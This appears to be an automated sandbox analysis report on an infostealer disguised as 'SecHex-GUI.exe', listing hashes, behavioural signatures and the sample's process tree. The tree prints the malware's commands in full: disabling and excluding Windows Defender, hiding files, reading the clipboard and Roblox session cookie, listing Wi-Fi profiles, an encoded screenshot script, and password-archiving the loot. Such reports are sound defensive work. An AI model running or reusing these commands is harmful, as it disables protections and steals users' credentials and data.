Analysis

  • max time kernel
    95s
  • max time network
    138s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28-11-2024 15:06

General

  • Target

    SecHex-GUI.exe

  • Size

    5.9MB

  • MD5

    54e1a0202204ceb2891bcd69916af0b7

  • SHA1

    c65d7231e64e9d398b8119ecacbdafe0f9063be1

  • SHA256

    aa691b29687e9885a8d8dad4d8135dfc345069ff5a231333c7b6a093af1ad951

  • SHA512

    d5e4130d01d2e141de900bdbdcc9eb82c6de437bee9b045fa8cc0ce8aa18620fe93bf08dd5306beb6958eb001c3354e457e1ec14c1df10200951b86c18d76030

  • SSDEEP

    98304:Go+WCSD5i65sn6Wfz7pnxCjJaWlpx1dstaNoSwKHf1c3z5MOueAeFF9hJkr+lmek:G7mDbDOYjJlpZstQoS9Hf12VKXqbJCQk

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

  • Drops file in Drivers directory 3 IoCs
  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 5 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
  • UPX packed file 61 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 20 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\SecHex-GUI.exe
    "C:\Users\Admin\AppData\Local\Temp\SecHex-GUI.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3540
    • C:\Users\Admin\AppData\Local\Temp\SecHex-GUI.exe
      "C:\Users\Admin\AppData\Local\Temp\SecHex-GUI.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:3140
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\SecHex-GUI.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4448
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\SecHex-GUI.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1064
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1672
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2164
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3124
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:1052
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2440
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic csproduct get uuid
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1368
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2452
        • C:\Windows\system32\reg.exe
          REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
          4⤵
            PID:4572
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4004
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
            4⤵
              PID:1008
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:544
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic path win32_VideoController get name
              4⤵
              • Detects videocard installed
              • Suspicious use of AdjustPrivilegeToken
              PID:3880
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2396
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic path win32_VideoController get name
              4⤵
              • Detects videocard installed
              PID:3408
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\SecHex-GUI.exe""
            3⤵
            • Hide Artifacts: Hidden Files and Directories
            • Suspicious use of WriteProcessMemory
            PID:3064
            • C:\Windows\system32\attrib.exe
              attrib +h +s "C:\Users\Admin\AppData\Local\Temp\SecHex-GUI.exe"
              4⤵
              • Views/modifies file attributes
              PID:3396
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‍ ‎‎ .scr'"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:5032
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‍ ‎‎ .scr'
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:5004
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4908
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              4⤵
              • Enumerates processes with tasklist
              PID:2400
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2804
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              4⤵
              • Enumerates processes with tasklist
              PID:4232
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
            3⤵
              PID:1428
              • C:\Windows\System32\Wbem\WMIC.exe
                WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                4⤵
                  PID:5000
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                3⤵
                • Clipboard Data
                PID:4676
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell Get-Clipboard
                  4⤵
                  • Clipboard Data
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1872
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                3⤵
                  PID:2724
                  • C:\Windows\system32\tasklist.exe
                    tasklist /FO LIST
                    4⤵
                    • Enumerates processes with tasklist
                    PID:3488
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                    PID:4840
                    • C:\Windows\system32\tree.com
                      tree /A /F
                      4⤵
                        PID:1572
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                      3⤵
                      • System Network Configuration Discovery: Wi-Fi Discovery
                      PID:3032
                      • C:\Windows\system32\netsh.exe
                        netsh wlan show profile
                        4⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Network Configuration Discovery: Wi-Fi Discovery
                        PID:3884
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "systeminfo"
                      3⤵
                        PID:3236
                        • C:\Windows\system32\systeminfo.exe
                          systeminfo
                          4⤵
                          • Gathers system information
                          PID:4548
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                        3⤵
                          PID:884
                          • C:\Windows\system32\reg.exe
                            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                            4⤵
                              PID:2060
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                            3⤵
                              PID:4728
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                4⤵
                                • Suspicious behavior: EnumeratesProcesses
                                PID:1256
                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wodhhjan\wodhhjan.cmdline"
                                  5⤵
                                    PID:1432
                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES95B8.tmp" "c:\Users\Admin\AppData\Local\Temp\wodhhjan\CSC96BE598F4EEA495AA6644598E23C75A.TMP"
                                      6⤵
                                        PID:3960
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                  3⤵
                                    PID:1764
                                    • C:\Windows\system32\tree.com
                                      tree /A /F
                                      4⤵
                                        PID:3524
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                      3⤵
                                        PID:2940
                                        • C:\Windows\system32\attrib.exe
                                          attrib -r C:\Windows\System32\drivers\etc\hosts
                                          4⤵
                                          • Drops file in Drivers directory
                                          • Views/modifies file attributes
                                          PID:544
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                        3⤵
                                          PID:3436
                                          • C:\Windows\system32\tree.com
                                            tree /A /F
                                            4⤵
                                              PID:4456
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                            3⤵
                                              PID:4108
                                              • C:\Windows\system32\attrib.exe
                                                attrib +r C:\Windows\System32\drivers\etc\hosts
                                                4⤵
                                                • Drops file in Drivers directory
                                                • Views/modifies file attributes
                                                PID:868
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                                              3⤵
                                                PID:4596
                                                • C:\Windows\System32\Conhost.exe
                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  4⤵
                                                    PID:3396
                                                  • C:\Windows\system32\tree.com
                                                    tree /A /F
                                                    4⤵
                                                      PID:440
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                    3⤵
                                                      PID:4388
                                                      • C:\Windows\system32\tasklist.exe
                                                        tasklist /FO LIST
                                                        4⤵
                                                        • Enumerates processes with tasklist
                                                        PID:1248
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                      3⤵
                                                        PID:848
                                                        • C:\Windows\system32\tree.com
                                                          tree /A /F
                                                          4⤵
                                                            PID:4432
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                          3⤵
                                                            PID:3328
                                                            • C:\Windows\system32\tree.com
                                                              tree /A /F
                                                              4⤵
                                                                PID:3348
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                              3⤵
                                                                PID:4408
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                  4⤵
                                                                  • Command and Scripting Interpreter: PowerShell
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:1796
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                3⤵
                                                                  PID:2356
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                    4⤵
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    PID:1064
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c "getmac"
                                                                  3⤵
                                                                    PID:2232
                                                                    • C:\Windows\system32\getmac.exe
                                                                      getmac
                                                                      4⤵
                                                                        PID:2512
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI35402\rar.exe a -r -hp"544" "C:\Users\Admin\AppData\Local\Temp\kaWFA.zip" *"
                                                                      3⤵
                                                                        PID:2452
                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI35402\rar.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\_MEI35402\rar.exe a -r -hp"544" "C:\Users\Admin\AppData\Local\Temp\kaWFA.zip" *
                                                                          4⤵
                                                                          • Executes dropped EXE
